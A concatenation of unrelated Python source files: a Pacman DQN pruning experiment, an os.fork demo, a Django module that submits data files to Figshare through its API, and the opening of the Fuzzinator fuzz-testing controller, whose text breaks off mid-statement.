from Pacman.accumulate_experience_Pacman import accumulate_experience
# Toggle: truthy -> prioritized experience replay; falsy -> plain multi-step replay.
USE_PER = 0
def prune_DQN():
    """Iteratively prune a pretrained Pacman DQN and plot sparsity vs. accuracy.

    Loads the dense checkpoint into both a prunable agent and a frozen target
    network, runs iterative pruning, then plots the resulting curve.
    """
    log = get_logger("prune_pacman_agent_using_DQN")
    # Build the prunable agent from the prune-phase hyperparameters.
    agent_kwargs = dict(
        input_size=prune_config.input_size,
        output_size=prune_config.output_size,
        model_path=prune_config.model_path,
        scope=prune_config.scope,
        epsilon_stop=prune_config.final_epsilon,
        epsilon=prune_config.initial_epsilon,
        pruning_end=prune_config.pruning_end,
        pruning_freq=prune_config.pruning_freq,
        sparsity_end=prune_config.sparsity_end,
        target_sparsity=prune_config.target_sparsity,
        prune_till_death=True,
    )
    pruned_agent = DQNPacman(**agent_kwargs)
    teacher = PacmanTargetNet(input_size=dense_config.input_size, output_size=dense_config.output_size)
    log.info("loading models")
    # Both networks start from the same ready (dense) checkpoint.
    teacher.load_model(dense_config.ready_path)
    pruned_agent.load_model(dense_config.ready_path)
    pruned_agent.reset_global_step()
    log.info("Commencing iterative pruning")
    curve = iterative_pruning(log, pruned_agent, teacher, prune_config.n_epoch)
    print("dqn finished")
    plot_graph(curve, "sparsity_vs_accuracy", figure_num=1)
    pruned_agent.sess.close()
def iterative_pruning(logger, agent, target_agent, n_epoch, benchmarking=False):
    """Prune `agent` iteratively while fine-tuning it against `target_agent` on MsPacman.

    Pruning pauses (stop_prune) whenever the evaluation score drops below
    dense_config.LOWER_BOUND and resumes once it exceeds OBJECTIVE_SCORE.
    Returns sparsity_vs_accuracy: [0] = NNZ parameter counts, [1] = eval scores.
    """
    env = gym.make('MsPacmanDeterministic-v4')
    if USE_PER:
        exp_replay = MultiStepPrioritizedExperienceReplay(size=dense_config.memory_size, gamma=agent.gamma,
                                                          alpha=dense_config.ALPHA_PER)
    else:
        exp_replay = ExperienceReplayMultistep(size=dense_config.memory_size, gamma=agent.gamma)
    total_steps = 0
    sparsity_vs_accuracy = [[], []]
    counter_for_consecutive_failed_trials = 0
    counter_for_last_evaluation = 0
    stop_prune = False          # True while the agent recovers from a pruning step
    finished = False            # True once pruning is declared over; extra evals follow
    last_sparsity_measure = -1
    sparsity_converged = 0      # consecutive evaluations with unchanged sparsity
    for e in range(n_epoch):
        # Play one episode, training (and pruning) every steps_per_train steps.
        state = init_state()
        observation = env.reset()
        observation = process_observation(observation)
        done = False
        state = append_frame(state, observation)
        while not done:
            total_steps += 1
            q_values = agent.get_q(state=np.expand_dims(state, axis=0))
            action = agent.select_action(qValues=q_values, explore=False)
            next_observation, reward, done, _ = env.step(action)
            next_observation = process_observation(next_observation)
            next_state = append_frame(state, next_observation)
            exp_replay.add_memory(state, action, reward, next_state, done,
                                  total_steps % dense_config.steps_per_train == 0)  # transaction are inserted after steps per train
            state = next_state
            if total_steps < prune_config.OBSERVE:  # filling up the experience replay
                continue
            if total_steps % dense_config.steps_per_train == 0:
                if not benchmarking:
                    train_on_batch(agent, target_agent, exp_replay, e, config=prune_config)
                else:
                    train_on_batch_with_benchmark(agent, target_agent, exp_replay, e, config=prune_config)
                if not stop_prune:  # this signal is down when the agent needs to recover from pruning
                    agent.prune()
        if e % 10 == 0:
            # Periodic evaluation: record (NNZ, score) whenever sparsity advanced.
            score = evaluate(agent=agent, n_epoch=student_config.eval_prune)
            sparsity = agent.get_model_sparsity()
            if last_sparsity_measure < sparsity:  # expect the sparsity to get bigger
                NNZ = agent.get_number_of_nnz_params()  # for paper
                sparsity_vs_accuracy[1].append(score)
                sparsity_vs_accuracy[0].append(NNZ)  # 0 is sparsity and 1 is score
                last_sparsity_measure = sparsity
                sparsity_converged = 0
            elif score > sparsity_vs_accuracy[1][-1]:  # better performance for current sparsity
                sparsity_vs_accuracy[1][-1] = score
            if last_sparsity_measure >= sparsity:  # sparsity remained un changed
                sparsity_converged += 1
            print("Episode {} / {} : accuracy is {} with sparsity {} , reward {}"
                  .format(e, n_epoch, sparsity_vs_accuracy[1][-1], sparsity, score))
            logger.info("Episode {} / {} : accuracy is {} with sparsity {} "
                        .format(e, n_epoch, sparsity_vs_accuracy[1][-1], sparsity))
            if total_steps >= prune_config.OBSERVE:
                if score > dense_config.OBJECTIVE_SCORE:
                    # Good score again: resume pruning if it had been paused.
                    if stop_prune:
                        stop_prune = False
                        freeze_global_step = agent.unfreeze_global_step()
                        logger.info("agent got back on the horse and managed to score 18 plus,"
                                    " continue pruning with global step {}".format(freeze_global_step))
                    logger.info("Saved best model with average score of {} and NNZ params {}".format(sparsity_vs_accuracy[1][-1], sparsity_vs_accuracy[0][-1]))
                    agent.save_model(prune_config.best_path)
                if score < dense_config.LOWER_BOUND or finished:
                    # Poor score: pause pruning and count consecutive failures.
                    if not stop_prune and not finished:
                        stop_prune = True
                        freeze_global_step = agent.freeze_global_step()  # algorithm works with global step
                        logger.info("stopped pruning due to low results, global step is {}".format(freeze_global_step))
                    counter_for_consecutive_failed_trials += 1
                    logger.info("consecutive trials failed {}".format(counter_for_consecutive_failed_trials))
                    if counter_for_consecutive_failed_trials >= 10 or sparsity_converged >= 10 or finished:
                        if finished:
                            # Run ~10 extra evaluations after finishing, then stop.
                            counter_for_last_evaluation += 1
                            stop_prune = False
                            if counter_for_last_evaluation > 10:
                                logger.info("Episode {} / {} : Done".format(e, n_epoch))
                                break
                        else:
                            logger.info("Episode {} / {} : Finished due to low accuracy for 10 consecutive trials".format(e, n_epoch))
                            finished = True
                else:
                    counter_for_consecutive_failed_trials = 0
    try:
        # NOTE(review): ImportError is an odd guard for `del env` — presumably
        # intended as best-effort cleanup; confirm against the original intent.
        del env
    except ImportError:
        pass
    return sparsity_vs_accuracy
#
# def prune_policy_dist(queue=None):
# logger = get_logger("prune_pong_agent_using_Policy_dist")
# prune_model = StudentPong(input_size=prune_config.input_size, output_size=prune_config.output_size,
# model_path=student_config.model_path_policy_dist_pruned, scope=prune_config.scope,
# epsilon=prune_config.initial_epsilon,
# pruning_end=prune_config.pruning_end,
# pruning_freq=prune_config.pruning_freq,
# sparsity_end=prune_config.sparsity_end,
# target_sparsity=prune_config.target_sparsity,
# prune_till_death=True)
# target_model = PongTargetNet(input_size=dense_config.input_size, output_size=dense_config.output_size)
# prune_model.print_num_of_params()
# logger.info("loading models")
# print("loading models")
# target_model.load_model(dense_config.ready_path) # load ready model
# prune_model.load_model(student_config.model_path_policy_dist_ready) # load output of train via policy_dist
# prune_model.reset_global_step()
# logger.info("Commencing iterative pruning")
# sparsity_vs_accuracy = iterative_pruning_policy_distilliation(agent=prune_model, target_agent=target_model,
# iterations=student_config.n_epochs, logger=logger)
# print("dist finished")
# plot_graph(sparsity_vs_accuracy, "sparsity_vs_accuracy", figure_num=1, file_name="sparsity_vs_accuracy_with_dist")
# if queue is not None:
# queue.put(sparsity_vs_accuracy)
# prune_model.sess.close()
#
# def main():
#
# DQN_Queue = Queue()
# policy_Queue = Queue()
# p_DQN = Process(target=prune_DQN, args=(DQN_Queue,))
# p_policy_dist = Process(target=prune_policy_dist, args=(policy_Queue,))
#
# p_DQN.start()
# p_policy_dist.start()
# sparsity_vs_accuracy_dqn = DQN_Queue.get()
# sparsity_vs_accuracy_policy = policy_Queue.get()
# plot_nnz_vs_accuracy(data_policy=sparsity_vs_accuracy_policy, data_pruned=sparsity_vs_accuracy_dqn,
# legend=('IPP', 'MBG Pruning'), xlabel='NNZ params', ylabel='Accuracy',
# title='', filename='results_prune.png')
# p_DQN.join()
# p_policy_dist.join()
# """
# plot_nnz_vs_accuracy(data_policy=[[1,1600000],[-21,21]], data_pruned=[[1,1600000],[-21,21]],
# legend=('IPP', 'MBGP p'), xlabel='Non-Zero parameters', ylabel='Score',
# title='', filename='results_prune.png')
# """
# def iterative_pruning_policy_distilliation(logger, agent, target_agent, iterations=100, use_per=False,
# config=student_config, best_path=student_config.model_path_policy_dist_best,
# arch_type=0, lower_bound=0.0, accumulate_experience_fn=accumulate_experience,
# evaluate_fn=evaluate, objective_score=18.0):
# initial_score = evaluate_fn(agent=agent)
# sparsity_vs_accuracy = [[], []]
# sparsity_vs_accuracy[1].append(initial_score)
# sparsity_vs_accuracy[0].append(agent.get_number_of_nnz_params()) # change back to sparsiy
# if use_per:
# exp_replay = Supervised_Prioritzed_ExperienceReplay(size=config.memory_size,
# alpha=config.ALPHA_PER)
# else:
# exp_replay = Supervised_ExperienceReplay(size=config.memory_size)
# stop_prune_arg = False
# m = 0
# cnt = 0
# sparsity_measure = 10e6 # put 0 when done
# for i in range(iterations):
# logger.info("-- ITERATION number " + str(i) + "/" + str(iterations) + ": accumulating experience from teacher --")
# print("-- ITERATION number " + str(i) + "/" + str(iterations) + ": accumulating experience from teacher --")
# accumulate_experience_fn(teacher=target_agent, exp_replay=exp_replay, config=config)
# logger.info("-- ITERATION number " + str(i) + "/" + str(iterations) +
# ": finished accumulating experience from teacher starting to prune and fine-tune the student --")
# print("-- ITERATION number " + str(i) + "/" + str(iterations) +
# ": finished accumulating experience from teacher starting to prune and fine-tune the student -- ")
# score_list, sparsity_list, stop_prune_arg = train_student(logger=logger, student=agent,
# exp_replay=exp_replay,
# prune=True,
# lr=config.learning_rate_schedule_prune(i, arch_type),
# stop_prune_arg=stop_prune_arg,
# epoch=i, use_per=use_per, best_path=best_path,
# config=config, evaluate_fn=evaluate_fn, objective_score=objective_score,
# lower_bound=lower_bound)
#
# for j, score in enumerate(score_list):
# if sparsity_list[j] < sparsity_vs_accuracy[0][-1]: # revered for paper if get smaller
# sparsity_vs_accuracy[1].append(score)
# sparsity_vs_accuracy[0].append(sparsity_list[j]) # nnz params get smaller
# if sparsity_list[j] == sparsity_vs_accuracy[0][-1] and score > sparsity_vs_accuracy[1][-1]:
# sparsity_vs_accuracy[1][-1] = score
#
# mean_score = np.mean(score_list)
# logger.info("-- iteration number " + str(i) + ": student evaluation after pruning procedeure is: "
# + str(mean_score) + " --")
# print("-- iteration number " + str(i) + ": student evaluation after pruning procedeure is: "
# + str(mean_score) + " --")
#
# if mean_score < lower_bound:
# m += 1
# logger.info("-- iteration {} / {} : {} consecutive trials with low score --"
# .format(i, iterations, m))
# if m % 5 == 0:
# logger.info("-- iteration {} / {} : Finished due to low accuracy for 5 consecutive trials --"
# .format(i, iterations))
# break
# else:
# m = 0
#
# if abs(sparsity_measure - sparsity_vs_accuracy[0][-1]) < 1e-3:
# cnt += 1
# logger.info("-- iteration {} / {} : {} consecutive trials with same sparsity --"
# .format(i, iterations, cnt))
# if cnt == 5:
# logger.info("sparsity converged, ending pruning procedure")
# break
# else:
# cnt = 0
# if sparsity_vs_accuracy[0][-1] < sparsity_measure: # reversed for paper, symbolize NNZ params instead of sparsity
# sparsity_measure = sparsity_vs_accuracy[0][-1]
# return sparsity_vs_accuracy
def prune_benchmark():
    """Prune a Pacman DQN agent with the benchmark loss and plot sparsity vs. accuracy."""
    logger = get_logger("prune_pong_agent_benchmark")
    # Student network that will be pruned down to the configured target sparsity.
    student = DQNPacman(
        input_size=prune_config.input_size,
        output_size=prune_config.output_size,
        model_path=prune_config.model_path,
        scope=prune_config.scope,
        epsilon_stop=prune_config.final_epsilon,
        epsilon=prune_config.initial_epsilon,
        pruning_end=prune_config.pruning_end,
        pruning_freq=prune_config.pruning_freq,
        sparsity_end=prune_config.sparsity_end,
        target_sparsity=prune_config.target_sparsity,
        prune_till_death=True)
    # Frozen dense network used as the reference during pruning.
    reference = PacmanTargetNet(input_size=dense_config.input_size,
                                output_size=dense_config.output_size)
    logger.info("loading models")
    print("loading models")
    # Both networks start from the same ready checkpoint.
    reference.load_model(dense_config.ready_path)
    student.load_model(dense_config.ready_path)
    student.change_loss_to_benchmark_loss()
    student.reset_global_step()
    logger.info("Commencing iterative pruning")
    curve = iterative_pruning(logger, student, reference, prune_config.n_epoch,
                              benchmarking=True)
    print("benchmark finished")
    plot_graph(curve, "sparsity_vs_accuracy_benchmark", figure_num=1)
# Entry point: run the pruning benchmark when executed as a script.
if __name__ == '__main__':
    prune_benchmark()
|
mutipleprocessing.py | import os
# Demo: create a child process with os.fork() (POSIX-only; not available on Windows).
print('process (%s) start...' % os.getpid())
# os.fork() returns 0 in the child process, while the parent receives the child's PID.
pid = os.fork()
if pid == 0:
    # Child branch: report our own PID and our parent's PID.
    print('I am child process (%s) and my parent is %s.' % (os.getpid(), os.getppid()))
else:
    # Parent branch: report the freshly created child's PID.
    print('I (%s) just created a child process (%s).' % (os.getpid(), pid))
# If you plan to write a multi-process server program, Unix/Linux is undoubtedly the right choice. Since Windows has no fork() call, does that mean Python cannot be used to write multi-process programs on Windows?
# Because Python is cross-platform, it naturally provides cross-platform multi-process support as well. The multiprocessing module is exactly that cross-platform version of the multi-process module.
# The multiprocessing module provides a Process class to represent a process object. The following example demonstrates starting a child process and waiting for it to finish:
# from multiprocessing import Process
# import os
# # 子进程要执行的代码
# def run_proc(name):
# print('Run child process %s (%s)...' % (name, os.getpid()))
# if __name__=='__main__':
# print('Parent process %s.' % os.getpid())
# p = Process(target=run_proc, args=('test',))
# print('Child process will start.')
# p.start()
# p.join()
# print('Child process end.')
# 执行结果如下:
# Parent process 928.
# Process will start.
# Run child process test (929)...
# Process end.
|
figshareSubmission.py | __author__ = 'felix.shaw@tgac.ac.uk - 03/05/2016'
import json
import requests
import os
from web.apps.web_copo.lookup.lookup import FIGSHARE_API_URLS
from chunked_upload.models import ChunkedUpload
from django.conf import settings
from dal.copo_da import DataFile, Submission
import threading
import datetime
from dal.copo_da import RemoteDataFile
from dal.figshare_da import Figshare
from web.apps.web_copo.schemas.utils import data_utils
from dal.figshare_da import Figshare
class FigshareSubmit(object):
    """Pushes COPO data files to Figshare through its v2 REST API.

    Upload progress and status are reported through a ``RemoteDataFile``
    transfer record created per submission.
    """

    def __init__(self, sub_id):
        # Endpoint template (filled in with ``endpoint=...``) and the current
        # user's OAuth token for authenticated requests.
        self.BASE_URL = FIGSHARE_API_URLS['base_url']
        request = data_utils.get_current_request()
        self.TOKEN = Figshare().get_token_for_user(request.user.id)['token']
        self.HEADERS = {'Authorization': 'token ' + self.TOKEN}
        self.MEDIA_ROOT = settings.MEDIA_ROOT
        # Transfer record used to report progress back to the UI.
        self.transfer_token = RemoteDataFile().create_transfer(sub_id)['_id']

    def submit(self, sub_id, dataFile_ids):
        """Run the submission asynchronously in a background daemon thread.

        Bug fix: the original passed ``self._submit(...)`` -- the *result* of
        calling it synchronously -- as the Thread target, so the upload ran on
        the calling thread and the spawned thread did nothing.
        """
        t = threading.Thread(target=self._submit,
                             kwargs={'sub_id': sub_id, 'dataFile_ids': dataFile_ids})
        t.daemon = True
        t.start()

    def _submit(self, sub_id, dataFile_ids):
        """Create a Figshare article per data file, upload its parts, and
        record the outcome on the Submission record.
        """
        for f_id in dataFile_ids:
            mongo_file = DataFile().get_record(f_id)
            c = ChunkedUpload.objects.get(pk=int(mongo_file["file_id"]))
            file_path = os.path.join(self.MEDIA_ROOT, str(c.file))
            orig_name = c.filename
            sub = mongo_file['description']['attributes']

            # Assemble the article metadata expected by the Figshare API.
            data = dict()
            data['defined_type'] = sub.get('type_category', dict()).get('type')
            data['title'] = sub.get('title_author_description', dict()).get('title')
            authors = sub.get('title_author_description', dict()).get('author').split(',')
            lst = list()
            for x in authors:
                lst.append({'name': x})
            data['authors'] = lst
            data['description'] = sub.get('title_author_description', dict()).get('description')
            cat = sub.get('type_category', dict()).get('categories')
            if cat:
                cat = cat.split(',')
                cat = list(map(int, cat))
                data['categories'] = cat
            else:
                data['categories'] = list()
            data['tags'] = sub.get('tags', dict()).get('keywords').split(',')
            # Pad short tags: presumably Figshare rejects tags shorter than
            # three characters -- TODO confirm against the API docs.
            for idx, t in enumerate(data['tags']):
                if len(t) < 3:
                    if len(t) == 1:
                        t = t + (2 * t)
                    elif len(t) == 2:
                        t = t + t
                    data['tags'][idx] = t
            data['references'] = sub.get('tags', dict()).get('references').split(',')
            # Qualify references as absolute URLs.
            # Bug fix: the original condition `(not x.startswith('http')) or
            # (not x.startswith('https'))` is true for every string (no string
            # starts with both), so well-formed http(s) URLs were re-prefixed.
            for idx, x in enumerate(data['references']):
                if x != '':
                    if not x.startswith(('http://', 'https://')):
                        if not x.startswith('www'):
                            data['references'][idx] = 'http://www.' + x
                        else:
                            data['references'][idx] = 'http://' + x
            if len(data['references']) == 1 and data['references'][0] == '':
                # if blank ref, pop
                data.pop('references')
            data['funding'] = sub.get('tags', dict()).get('funding')
            data['licenses'] = sub.get('tags', dict()).get('licenses')
            data['publish'] = sub.get('figshare_publish', dict()).get('should_publish')

            # Create article
            endpoint = 'account/articles'
            resp = requests.post(self.BASE_URL.format(endpoint=endpoint),
                                 headers=self.HEADERS, data=json.dumps(data))
            article_id = json.loads(resp.content.decode('utf8'))['location'].rsplit('/', 1)[1]

            # File size: c.offset is the number of bytes already received by
            # the chunked upload.
            size = c.offset
            info = json.dumps({'name': orig_name, 'size': size})

            # Initiate upload
            endpoint = 'account/articles/{}/files'.format(article_id)
            resp = requests.post(self.BASE_URL.format(endpoint=endpoint),
                                 headers=self.HEADERS, data=info)
            file_id = json.loads(resp.content.decode('utf-8'))['location'].rsplit('/', 1)[1]

            # Get upload/parts info
            endpoint = 'account/articles/{}/files/{}'.format(article_id, file_id)
            resp = requests.get(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
            url = '{upload_url}'.format(**json.loads(resp.content.decode('utf-8')))
            parts = json.loads(requests.get(url).content.decode('utf-8'))['parts']

            # Upload parts, reporting rate/percentage after each one.
            with open(file_path, 'rb') as fin:
                for idx, part in enumerate(parts):
                    percent_done = idx / len(parts) * 100
                    size = part['endOffset'] - part['startOffset'] + 1
                    address = '{}/{}'.format(url, part['partNo'])
                    x = datetime.datetime.now()
                    requests.put(address, data=fin.read(size))
                    delta = datetime.datetime.now() - x
                    # calculate current upload rate in MB per second
                    bw = (size / delta.total_seconds()) / 1000 / 1000
                    fields = {'transfer_rate': bw, 'pct_completed': percent_done}
                    RemoteDataFile().update_transfer(self.transfer_token, fields)

            # Mark file upload as completed
            requests.post(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
            fields = {'pct_completed': 100, 'transfer_status': 'success',
                      'completed_on': str(datetime.datetime.now()),
                      'article_id': article_id}
            RemoteDataFile().update_transfer(self.transfer_token, fields)

            if data['publish'] == 'True':
                # publish api
                endpoint = 'account/articles/{}/publish'.format(article_id)
                resp = requests.post(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
                location = json.loads(resp.content.decode('utf8'))['location']
                # get accession data
                endpoint = 'articles/{}'.format(article_id)
                resp = requests.get(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
                # save accessions to mongo profile record
                s = Submission().get_record(sub_id)
                s['article_id'] = json.loads(resp.content.decode('utf8'))['figshare_url']
                s['complete'] = True
                s['status'] = 'published'
                s['target_id'] = str(s.pop('_id'))
                Submission().save_record(dict(), **s)
            else:
                # save accessions to mongo profile record
                s = Submission().get_record(sub_id)
                s['article_id'] = article_id
                s['complete'] = True
                s['status'] = 'not published'
                s['target_id'] = str(s.pop('_id'))
                Submission().save_record(dict(), **s)
            # mark submission as complete
            # NOTE(review): mark_submission_complete is called twice (with and
            # without article_id) in the original; kept as-is pending
            # confirmation that the second call is intentional.
            Submission().mark_submission_complete(sub_id, article_id=article_id)
            Submission().mark_submission_complete(sub_id)
            Submission().mark_figshare_article_id(sub_id=sub_id, article_id=article_id)

    def publish_article(self, article_id):
        """Publish a previously created private article; on success, mark it
        published on the Submission record. Returns the HTTP response.
        """
        endpoint = 'account/articles/{}/publish'.format(article_id)
        post = self.BASE_URL.format(endpoint=endpoint)
        resp = requests.post(post, headers=self.HEADERS)
        if resp.status_code in (200, 201):
            Submission().mark_figshare_article_published(article_id)
        return resp

    def isValidCredentials(self, user_id):
        """Return True iff a working Figshare token is stored for *user_id*.

        Bug fix: the original looked the token up for the *current* user
        (``data_utils.get_current_user().id``) while deleting invalid tokens
        for ``user_id``; the ``user_id`` argument is now used consistently.
        An invalid stored token is deleted so the user is prompted for a new one.
        """
        # check if token exists for user
        token = Figshare().get_token_for_user(user_id=user_id)
        if token:
            # now check if token works
            headers = {'Authorization': 'token ' + token['token']}
            r = requests.get('https://api.figshare.com/v2/account/articles', headers=headers)
            if r.status_code == 200:
                return True
            else:
                # we have an invalid token stored, so we should delete it and prompt the user for a new one
                Figshare().delete_tokens_for_user(user_id=user_id)
        return False
|
controller.py | # Copyright (c) 2016-2018 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
import psutil
import shutil
import signal
import time
import traceback
from multiprocessing import Lock, Process, Queue
from .config import config_get_callable, config_get_kwargs, config_get_name_from_section, config_get_with_writeback, import_entity
from .job import FuzzJob, ReduceJob, UpdateJob, ValidateJob
from .listener import ListenerManager
from .mongo_driver import MongoDriver
class Controller(object):
    """
    Fuzzinator's main controller that orchestrates a fuzz session by scheduling
    all related activities (e.g., keeps SUTs up-to-date, runs fuzzers and feeds
    test cases to SUTs, or minimizes failure inducing test cases) . All
    configuration options of the framework must be encapsulated in a
    :class:`configparser.ConfigParser` object.

    The following config sections and options are recognized:

      - Section ``fuzzinator``: Global settings of the framework.

        - Option ``work_dir``: Pattern of work directory for temporary files,
          which may contain the substring ``{uid}`` as a placeholder for a
          unique string (replaced by the framework). (Optional, default:
          ``~/.fuzzinator-{uid}``)
        - Option ``db_uri``: URI to a MongoDB database to store found issues and
          execution statistics. (Optional, default:
          ``mongodb://localhost/fuzzinator``)
        - Option ``cost_budget``: (Optional, default: number of cpus)

      - Sections ``sut.NAME``: Definitions of a SUT named *NAME*

        - Option ``call``: Fully qualified name of a python callable that must
          accept a ``test`` keyword argument representing the input to the SUT
          and must return a dictionary object if the input triggered an issue
          in the SUT, or a value considered false otherwise (which can be a
          simple ``None``, but can also be a ``NonIssue`` in complex cases).
          The returned issue dictionary (if any) *should* contain an ``'id'``
          field that equals for issues that are not considered unique.
          (Mandatory)

          See package :mod:`fuzzinator.call` for potential callables.
        - Option ``cost``: (Optional, default: 1)
        - Option ``reduce``: Fully qualified name of a python callable that must
          accept ``issue``, ``sut_call``, ``sut_call_kwargs``, ``listener``,
          ``ident``, ``work_dir`` keyword arguments representing an issue to be
          reduced (and various other potentially needed objects), and must
          return a tuple consisting of a reduced test case for the issue (or
          ``None`` if the issue's current test case could not be reduced) and a
          (potentially empty) list of new issues that were discovered during
          test case reduction (if any). (Optional, no reduction for this SUT if
          option is missing.)

          See package :mod:`fuzzinator.reduce` for potential callables.
        - Option ``reduce_call``: Fully qualified name of a python callable that
          acts as the SUT's ``call`` option during test case reduction.
          (Optional, default: the value of option ``call``)

          See package :mod:`fuzzinator.call` for potential callables.
        - Option ``reduce_cost``: (Optional, default: the value of option
          ``cost``)
        - Option ``validate_call``: Fully qualified name of a python callable
          that acts as the SUT's ``call`` option during test case validation.
          (Optional, default: the value of option ``reduce_call`` if defined,
          otherwise the value of option ``call``)

          See package :mod:`fuzzinator.call` for potential callables.
        - Option ``update_condition``: Fully qualified name of a python callable
          that must return ``True`` if and only if the SUT should be updated.
          (Optional, SUT is never updated if option is missing.)

          See package :mod:`fuzzinator.update` for potential callables.
        - Option ``update``: Fully qualified name of a python callable that
          should perform the update of the SUT. (Optional, SUT is never updated
          if option is missing.)

          See package :mod:`fuzzinator.update` for potential callables.
        - Option ``formatter``: Fully qualified name of a python callable that
          formats the issue dictionary of the SUT and returns a custom string
          representation. It must accept ``issue`` and ``format`` keyword
          arguments representing an issue to be formatted and a formatting
          instruction. If ``format`` is ``'long'`` or not specified, the issue
          should be formatted in full, while if ``'short'`` is given, a
          summary description (preferably a single line of text) should be
          returned.
          (Optional, default: :mod:`fuzzinator.formatter.JsonFormatter`.)

          See package :mod:`fuzzinator.formatter` for further potential
          callables.
        - Option ``tui_formatter``: Fully qualified name of a python
          callable that formats the issue dictionary of the SUT to display
          it in the TUI issue viewer interface.
          (Optional, default: the value of option ``formatter``)

          See package :mod:`fuzzinator.formatter` for further potential
          callables.
        - Option ``email_formatter``: Fully qualified name of a python
          callable that formats the issue dictionary of the SUT to insert
          it into an e-mail notification.
          (Optional, default: the value of option ``formatter``)

          See package :mod:`fuzzinator.formatter` for further potential
          callables.

      - Sections ``fuzz.NAME``: Definitions of a fuzz job named *NAME*

        - Option ``sut``: Name of the SUT that describes the subject of
          this fuzz job. (Mandatory)
        - Option ``fuzzer``: Fully qualified name of a python callable that must
          accept and ``index`` keyword argument representing a running counter
          in the fuzz job and must return a test input (or ``None``, which
          signals that the fuzzer is "exhausted" and cannot generate more test
          cases in this fuzz job). The semantics of the generated test input is
          not restricted by the framework, it is up to the configuration to
          ensure that the SUT of the fuzz job can deal with the tests generated
          by the fuzzer of the fuzz job. (Mandatory)

          See package :mod:`fuzzinator.fuzzer` for potential callables.
        - Option ``batch``: Number of times the fuzzer is requested to generate
          a new test and the SUT is called with it. (Optional, default: 1)
        - Option ``instances``: Number of instances of this fuzz job allowed to
          run in parallel. (Optional, default: ``inf``)
        - Option ``refresh``: Statistic update frequency in terms of executed
          test cases. (Optional, default: ``batch`` size)

      - Section ``listeners``: Definitions of custom event listeners.
        This section is optional.

        - Options ``OPT``: Fully qualified name of python class that
          executes custom actions to selected events.

        See package :mod:`fuzzinator.listeners` for potential listeners.

    - Callable options can be implemented as functions or classes with
      ``__call__`` method (the latter are instantiated first to get a callable
      object). Both constructor calls (if any) and the "real" calls can be
      given keyword arguments. These arguments have to be specified in
      sections ``(sut|fuzz).NAME.OPT[.init]`` with appropriate names (where
      the ``.init`` sections stand for the constructor arguments).

    - All callables can be decorated according to python semantics. The
      decorators must be callable classes themselves and have to be specified
      in options ``OPT.decorate(N)`` with fully qualified name. Multiple
      decorators can be applied to a callable ``OPT``, their order is
      specified by an integer index in parentheses. Keyword arguments to be
      passed to the decorators have to be listed in sections
      ``(sut|fuzz).NAME.OPT.decorate(N)``.

      See packages :mod:`fuzzinator.call` and :mod:`fuzzinator.fuzzer` for
      potential decorators.
    """

    def __init__(self, config):
        """
        :param configparser.ConfigParser config: the configuration options of the
            fuzz session.

        :ivar fuzzinator.ListenerManager listener: a listener manager object that is
            called on various events during the fuzz session.
        """
        self.config = config

        # Extract fuzzer names from sections describing fuzzing jobs.
        self.fuzzers = [config_get_name_from_section(section) for section in config.sections() if section.startswith('fuzz.') and section.count('.') == 1]
        # Total cost the controller may run in parallel at any time.
        self.capacity = int(config_get_with_writeback(self.config, 'fuzzinator', 'cost_budget', str(os.cpu_count())))
        # Per-session unique work directory (the {uid} placeholder is filled
        # with the controller's PID) written back into the config.
        self.work_dir = config_get_with_writeback(self.config, 'fuzzinator', 'work_dir', os.path.join(os.getcwd(), '.fuzzinator-{uid}')).format(uid=os.getpid())
        self.config.set('fuzzinator', 'work_dir', self.work_dir)
        self.db = MongoDriver(config_get_with_writeback(self.config, 'fuzzinator', 'db_uri', 'mongodb://localhost/fuzzinator'))
        self.db.init_db([(self.config.get('fuzz.' + fuzzer, 'sut'), fuzzer) for fuzzer in self.fuzzers])
        # Instantiate every configured listener and register it with the manager.
        self.listener = ListenerManager()
        for name in config_get_kwargs(self.config, 'listeners'):
            entity = import_entity(self.config.get('listeners', name))
            self.listener += entity(config=config, **config_get_kwargs(config, 'listeners.' + name + '.init'))
        # Monotonically increasing job identifier source.
        self._job_id = 0
        # Issues waiting to be reduced; filled by add_reduce_job().
        self._issue_queue = Queue()
        self._lock = Lock()

    def run(self, *, max_cycles=None):
        """
        Start the fuzz session.

        :param int max_cycles: maximum number to iterate through the fuzz jobs
            defined in the configuration (defaults to ``inf``).
        """
        max_cycles = max_cycles if max_cycles is not None else float('inf')
        cycle = 0
        running_jobs = dict()
        fuzz_idx = 0

        try:
            while True:
                # Reap finished jobs (requesting load 0 never blocks).
                self._wait_for_load(0, running_jobs)

                # A new cycle starts whenever fuzz_idx wraps around to 0.
                if fuzz_idx == 0:
                    cycle += 1
                if cycle > max_cycles or (not self.fuzzers and max_cycles != float('inf')):
                    # Drain all running jobs before leaving the loop.
                    self._wait_for_load(self.capacity, running_jobs)
                    break

                next_job = None

                if not self._issue_queue.empty():
                    # Perform all the reduce jobs before start hunting for new issues.
                    while not self._issue_queue.empty():
                        issue = self._issue_queue.get_nowait()
                        if self.config.has_option('sut.' + issue['sut'], 'reduce'):
                            next_job_id = self._next_job_id()
                            next_job = ReduceJob(id=next_job_id,
                                                 config=self.config,
                                                 issue=issue,
                                                 work_dir=self.work_dir,
                                                 db=self.db,
                                                 listener=self.listener)
                            self.listener.new_reduce_job(ident=next_job_id,
                                                         sut=next_job.sut_name,
                                                         cost=next_job.cost,
                                                         issue_id=issue['id'],
                                                         size=len(issue['test']))
                            break

                if not next_job:
                    if not self.fuzzers:
                        # Nothing to fuzz; idle until reduce jobs arrive.
                        time.sleep(1)
                        continue

                    # Respect the per-fuzz-job 'instances' limit; skip to the
                    # next fuzzer if this one is already at its limit.
                    fuzz_section = 'fuzz.' + self.fuzzers[fuzz_idx]
                    instances = self.config.get(fuzz_section, 'instances', fallback='inf')
                    instances = float(instances) if instances == 'inf' else int(instances)
                    if instances <= sum(1 for job in running_jobs.values() if isinstance(job['job'], FuzzJob) and job['job'].fuzzer_name == self.fuzzers[fuzz_idx]):
                        # Update fuzz_idx to point the next job's parameters.
                        fuzz_idx = (fuzz_idx + 1) % len(self.fuzzers)
                        continue

                    next_job_id = self._next_job_id()
                    next_job = FuzzJob(id=next_job_id,
                                       config=self.config,
